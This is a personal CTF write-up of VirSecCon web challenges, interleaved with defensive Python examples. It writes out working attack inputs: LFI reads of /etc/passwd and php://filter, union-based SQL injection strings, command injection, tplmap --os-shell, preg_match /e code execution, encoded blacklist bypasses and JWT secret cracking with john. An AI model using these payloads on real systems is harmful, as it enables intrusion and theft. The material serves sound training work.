Royal_Rose_Red_Lay

VirSecCon_CTF_challenge

Sep 21st, 2020 (edited)
# Today's knowledge (Shellshock vulnerability) 9/22/2020
#### https://blog.cloudflare.com/inside-shellshock/
# Write-up for VirSecCon CTF
#### https://github.com/Yash-Amin/virsecconCTF/tree/master/Web
#### https://www.youtube.com/watch?v=_d82Ia0RV0w

9/22/2020
# Countdown
First I clicked the link and an alert appeared: "You are too late !!!!!!!"
Then I passed the request through Burp Suite and increased the cookie value. Now I get the flag!

* View the source of any PHP file:
** php://filter/convert.base64-encode/resource=index
** fopen wrappers work with the following functions: include, include_once, require, require_once.

# Hot Access
Right-click --> View Page Source
I found the links that were used to load PHP files, for example --> <a href="http://jh2i.com:50016/?m=modules/date.php">. So this may be LFI, and I changed the query to /etc/passwd (or on Windows, \etc\passwd) <<<< ?m=/etc/passwd >>>> This shows /etc/passwd!!
The next step can go two ways: try ?m=.htaccess, or use php://filter/convert.base64-encode/resource=index.php
1st way --> enter .htaccess and you can see the directory; I put this after the parameter --> ?m=/var/www/html/sshh_dont_tell_i_hid_the_flag_here and I got the flag!
2nd way --> ?m=php://filter/convert.base64-encode/resource=index.php ... brute force with lfi.txt ---> .htaccess, and I found the directory and pasted it after the parameter. Now I get the flag.

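An added example, not the challenge's code: Hot Access hands the ?m= value straight to include, which is what lets ?m=/etc/passwd and the php://filter wrapper through. The resolver below serves only allowlisted module names from one directory; MODULE_DIR and the allowlist are hypothetical.

```python
import os
from typing import Optional
from urllib.parse import urlparse

MODULE_DIR = os.path.realpath("/var/www/html/modules")   # hypothetical
ALLOWED_MODULES = {"date", "news", "contact"}             # hypothetical

def resolve_module(m: str) -> Optional[str]:
    """Return the absolute file to serve for ?m=<m>, or None to refuse it."""
    # 1. Anything with a scheme (php://, data:, http:, ...) is a stream
    #    wrapper, not a file in the module directory.
    if urlparse(m).scheme:
        return None
    # 2. Normalise the two spellings the site's own links use, then consult
    #    the allowlist instead of trusting the caller's path.
    name = m[len("modules/"):] if m.startswith("modules/") else m
    if name.endswith(".php"):
        name = name[:-len(".php")]
    if name not in ALLOWED_MODULES:
        return None          # /etc/passwd, .htaccess, ../index all stop here
    # 3. Defence in depth: the resolved path must stay inside MODULE_DIR even
    #    if a bad entry ever reaches the allowlist.
    full = os.path.realpath(os.path.join(MODULE_DIR, name + ".php"))
    if os.path.commonpath([full, MODULE_DIR]) != MODULE_DIR:
        return None
    return full
```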
9/23/2020
**strcmp is a function created to compare strings.** We use an array to bypass the strcmp string check !!! flag[]=""
# PHPJuggler
In the page source, I saw the strcmp function!! So I used Burp and bypassed strcmp by changing flag=anything to flag[]=anything. TAN TANNN TAN !!!!!!!

** {{ ... }} for expressions to print to the template output ("Jinja2 template")
** Tplmap – open-source tool to scan for server-side template injection vulnerabilities
** git clone https://github.com/epinna/tplmap
python tplmap.py -u url -d "variable=*"

# Mask
Hint::: Flask application ---> So I tested {{2*5}}, and it worked!! Therefore I applied tplmap for server-side template injection!!
python tplmap.py -u url -d "mask=*"   # mask = variable
tplmap comes back offering one of the following options !! --os-shell, and then: python tplmap.py -u url -d "mask=*" --os-shell
Run commands on the operating system
$ ls
$ cat flag.txt BOMMMMM!!!!!!!!!

# Character Web Shell
I passed the request through Burp and saw the parameter. So I tested the parameter with ?c=ls or ?c=;ls and it worked. I scrolled through the output and found flag.txt, so I read flag.txt: http://...../flag.txt, or another way, ?c=cat */*. W0W!!!! Wowwww!!!! Wow!

# Sequetilis
I got a new idea in this challenge! If I see a search form, I test whether it is SQL or not!!!
## ' or 1=1 -- -   ## '+or+'1'='1
Then I wanted to know the number of columns, so I wrote this --> ' order by 1 -- - and then 2, 3, 4
#### ' union select 1,2,3 -- -
#### ' union select table_schema,2,table_name from information_schema.tables -- - OR
## ' union select group_concat(table_name),2,3 from information_schema.tables -- -
#### ' union select column_name,2,3 from information_schema.columns -- - OR
## ' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- -
#### ' union select value,2,3 from flag -- -
## ' union select group_concat(column_name),2,3 from information_schema.columns where column_name='flag' -- -
## ' union select value,2,3 from flag -- -

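An added example, not part of the write-up: the Sequetilis form splices the search term into its SQL text, which is why ' or 1=1 -- - returns every row, ' order by N -- - reveals the column count and ' union select ... -- - reads other tables. The same search is run vulnerable and parameterised against an in-memory SQLite table with constructed rows; SQLite has no information_schema, so the union reads a constructed flag table directly.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the challenge's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1,'apple',3),(2,'pear',4),(3,'kiwi',5);
        CREATE TABLE flag(value TEXT);
        INSERT INTO flag VALUES ('LLS{constructed_example_flag}');
    """)
    return con

def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    # The term becomes part of the statement: its quote closes the literal and
    # everything after it (OR, ORDER BY, UNION, the -- comment) is parsed as SQL.
    sql = f"SELECT id, name, price FROM products WHERE name = '{term}'"
    return con.execute(sql).fetchall()

def search_safe(con: sqlite3.Connection, term: str) -> list:
    # Bound parameter: the driver passes the term as a value, never as SQL
    # text, so quotes and comment markers inside it have no syntactic effect.
    return con.execute(
        "SELECT id, name, price FROM products WHERE name = ?", (term,)
    ).fetchall()

def order_by_probe(con: sqlite3.Connection, n: int) -> bool:
    """Mirror the write-up's column-count probe: does ' order by n -- - run?"""
    try:
        search_vulnerable(con, f"' order by {n} -- -")
        return True
    except sqlite3.OperationalError:   # 'ORDER BY term out of range'
        return False
```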
**** https://location-href.com/web-security/
9/24/2020
** GitDumper
* Downloads .git repositories from web servers that do not have directory listing enabled.
usage --> ./gitdumper.sh -h

# Dairy Products
git milk?
So I tried the URL with git :) /.git, like "http://142.93.3.19:50008/.git"

I used gitdumper to download the repository!!
### ./gitdumper.sh http://142.93.3.19:50008/.git dump   # if the folder already exists, delete it first: rm -r demo. After the download completes:
### cd ../Extractor ## ls ## if an output folder exists, delete it: rm -r output
### ./extractor.sh ../Dumper/dump/ output
### cd output ### grep -rn "LLS{" OHHHHHHHHHHHHHHHHH!!!!!!!!! SoOOOO DiZzy !!!!!!!!!!!!!!!!!!!

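An added example, not part of the write-up: what a .git dump looks like from the server side. The scanner below walks constructed combined-format access-log lines and reports, per client, how many requests touched a .git path and how many were actually served with a 2xx, which is the signal that the repository is exposed rather than merely probed.

```python
import re
from collections import Counter

# Constructed access-log lines in combined format; client addresses are from
# the RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Sep/2020:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.7 - - [24/Sep/2020:10:01:05 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
203.0.113.7 - - [24/Sep/2020:10:01:05 +0000] "GET /.git/objects/ HTTP/1.1" 403 153
203.0.113.7 - - [24/Sep/2020:10:01:06 +0000] "GET /.git/index HTTP/1.1" 200 1287
198.51.100.4 - - [24/Sep/2020:10:02:00 +0000] "GET /about.php HTTP/1.1" 200 301
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)
# Matches /.git and anything under it, but not e.g. /.gitignore.
GIT_PATH = re.compile(r"(^|/)\.git(/|$)")

def git_probe_report(log_text: str) -> dict:
    """Per-client counts of requests touching .git and of those served (2xx)."""
    hits, served = Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not GIT_PATH.search(m["path"]):
            continue
        hits[m["ip"]] += 1
        if m["status"].startswith("2"):
            served[m["ip"]] += 1   # a 2xx means the file really left the server
    return {"requests": dict(hits), "served": dict(served)}
```

A non-zero "served" count for /.git/HEAD or /.git/index is the condition to alert on; 403s alone show only that the path is being probed.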
# Irregular Function
**preg_match -> regular expression match!** preg_match(/php/i ---> i means case-insensitive search !!! (pattern part)
In this challenge I noticed the regex function. I know that the preg_match function was vulnerable to remote code execution (RCE).
So, bypass this function with /e in the pattern, like /quick/e, and try to read /etc/passwd using the system function: system('/etc/passwd') and then system('ls -al'). As a result, this found the irregular word, which I read with system('cat irregular words'). Another way! In Burp Suite: pattern = /(.*)/e, replace = `ls+-la`, text = test, and to read the file, GET /irregular word

# GET Encoded
I visited the link and found only these words: "Machine hunts for more than humans do"
First I tried this URL --> jh2i.com:50013/robots.txt. Wow!! Disallow: /?debug >>>> jh2i.com:50013/?debug >>>
$blacklist = assert|system|passthru|exec.... >> and it is checked with -> if (preg_match("/$blacklist/i", $_SERVER['REQUEST_URI'])) { die("Go away hacker"); } -> So I used Burp and sent GET /?system=ls HTTP/1.1. But I got an error. In the Decoder tab I URL-encoded "system", copied it, and sent GET /?%73%79%73%74%65%6d=ls. I found a ----.php file and sent GET /?%73%79%73%74%65%6d=----.php and got an error again. Finally, I URL-encoded the PHP file name too. BOMMM!!!!!!!!!!!!!!

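An added example, not the challenge's code: the GET Encoded filter runs its blacklist regex over the raw request URI, so the percent-encoded spelling of "system" never matches while PHP still decodes the parameter name to "system". Three checks are compared: the raw-URI regex, the same regex over fully decoded parameter names and values, and an allowlist of the names the endpoint actually defines. The blacklist words come from the write-up; ALLOWED_PARAMS and the sample URIs are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

BLACKLIST = re.compile(r"assert|system|passthru|exec", re.I)
ALLOWED_PARAMS = {"debug"}   # constructed: what the endpoint really accepts

def blocked_raw(request_uri: str) -> bool:
    """The challenge's check: regex over the undecoded request line."""
    return BLACKLIST.search(request_uri) is not None

def fully_decode(s: str, rounds: int = 5) -> str:
    """Percent-decode until stable, so %2573 -> %73 -> 's' (bounded loop)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def decoded_params(request_uri: str) -> list:
    """Parameter (name, value) pairs as the application will actually see them."""
    query = urlsplit(request_uri).query
    return [(fully_decode(k), fully_decode(v))
            for k, v in parse_qsl(query, keep_blank_values=True)]

def blocked_decoded(request_uri: str) -> bool:
    """Same blacklist, applied to the decoded names and values the code uses."""
    return any(BLACKLIST.search(k) or BLACKLIST.search(v)
               for k, v in decoded_params(request_uri))

def allowed_params_only(request_uri: str) -> bool:
    """Positive model: refuse any parameter name the endpoint does not define."""
    return all(k in ALLOWED_PARAMS for k, _ in decoded_params(request_uri))
```

Even the decoded blacklist is still a blacklist; the allowlist is what removes the "parameter name becomes a function name" behaviour altogether.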
# Eyeless
First I tested the username ==> ' or 1=1 -- - with password=1111, and "Good Job" appeared. But no flag HERE!! Damn! I knew it was SQL injection. Then I opened the developer tools and took the params. Now I used sqlmap ## sqlmap -u "url" --data="param" --dbs
To make it faster: ## sqlmap -u "url" --data="param" --dbs --time-sec=2 --threads 10
Skip --> # sqlmap -u "url" --data="param" -D eyeless -T users --dump --time-sec=2
ARRR!!! I got it.

# JaWT
This challenge is about JSON Web Tokens. The challenge needs us to change the user to admin. But changing the value to admin without knowing the secret key is not possible. To find the secret key, we need to use John the Ripper on Linux.
JWT debugger -> jwt.io (in browser)
1. Copy the cookie value and paste it into "Encoded" in the JWT debugger -> we see the three parts -> payload, header, signature
2. Copy the cookie and save it as something.txt
3. #john ./picoJWT-textfile.txt --wordlist=./rockyou.txt (/usr/share/wordlists/rockyou.txt)
OR
3. john something.txt -> john --show something.txt

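An added example, not the challenge's code: the JaWT token could be re-signed with user=admin only because the HS256 secret was a dictionary word that john recovered from rockyou. This stdlib-only verifier pins the algorithm to HS256 (so alg=none or a swapped alg is refused), compares signatures in constant time, and refuses to issue tokens with a secret under 32 bytes; the Countdown cookie had the same root problem, server state held by the client with no integrity check. The secret and claims are constructed.

```python
import base64, hashlib, hmac, json
from typing import Optional

MIN_SECRET_BYTES = 32   # example policy: at least a 256-bit random key

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token; weak secrets are refused at issuance, where it is cheap."""
    if len(secret) < MIN_SECRET_BYTES:
        raise ValueError("HS256 secret too short; use >= 32 random bytes")
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the token verifies under HS256, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        claims = json.loads(b64url_decode(p))
        sig = b64url_decode(s)
    except ValueError:          # wrong part count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None             # algorithm is pinned server-side, not read from the token
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None             # catches a re-encoded payload such as user -> admin
    return claims if isinstance(claims, dict) else None
```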